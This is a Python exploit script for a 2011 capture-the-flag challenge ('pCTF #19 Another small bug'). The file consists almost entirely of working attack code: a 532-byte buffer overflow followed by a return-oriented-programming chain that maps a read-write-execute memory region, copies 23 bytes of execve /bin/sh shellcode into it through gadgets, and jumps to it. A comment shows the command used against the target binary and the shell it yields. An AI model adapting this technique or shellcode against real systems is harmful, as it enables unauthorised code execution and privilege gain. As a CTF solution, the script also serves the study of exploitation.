exploit.py

1. # file name : exploit.py
2.  
3. #!/usr/bin/env python
4. # pCTF 2011 - #19 Another small bug
5. # ROP: mmap an rwx area, copy a shellcode and jump
6.  
7. # $ { python exploit.py; cat; } |/opt/pctf/z2/exploitme 1300
8. # AAAAA[...]
9. # id
10. # uid=2015(z2_16) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users)
11.  
12. from struct import pack,unpack
13.  
14. mmap = 0x08049ABC
15.  
16. pop_4 = 0x08048973 # add esp 0x10 (16=4*4)
17. pop_14 = 0x08048d01 # add esp 0x30 (48=4*12) ; pop ebx ; pop esi
18. add_ecx_al = 0x08049cfd # add [ecx] al
19. pop_ecx = 0x0804889f # pop ecx
20. pop_eax = 0x0804859f # pop eax
21.  
22. area,size = 0x13370000, 0x10000
23.  
24. # /bin/sh - 23 bytes
25. SC = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"
26.  
27. def copy_byte(address, byte):
28.   s  = pack("<I", pop_ecx)
29.   s += pack("<I", address)
30.   s += pack("<I", pop_eax)
31.   s += pack("<I", ord(byte))
32.   s += pack("<I", add_ecx_al)
33.   return s
34.  
35. p = "A"*532
36.  
37. # mmap an rwx area
38. p += pack("<I", mmap)
39. p += pack("<I", pop_14)
40. p += pack("<I", area) # void *addr
41. p += pack("<I", size) # size_t length
42. p += pack("<I", 0x7) # int prot - PROT_READ(0x1) | PROT_WRITE(0x2) | PROT_EXEC(0x4)
43. p += pack("<I", 0x22) # int flags - MAP_ANONYMOUS(0x20) | MAP_PRIVATE(0x02)
44. p += pack("<I", 0xffffffff) # int fd - MAP_ANONYMOUS => -1
45. p += pack("<I", 0) # off_t offset
46. p += pack("<I", 0)*(14-6) # unused
47.  
48. # copy shellcode - and we dont want 0a :)
49. for i in range(len(SC)):
50.   p += copy_byte(area+0xb+i, SC[i])
51.  
52. # jump to it!
53. p += pack("<I", area+0xb)
54.  
55. print p
56.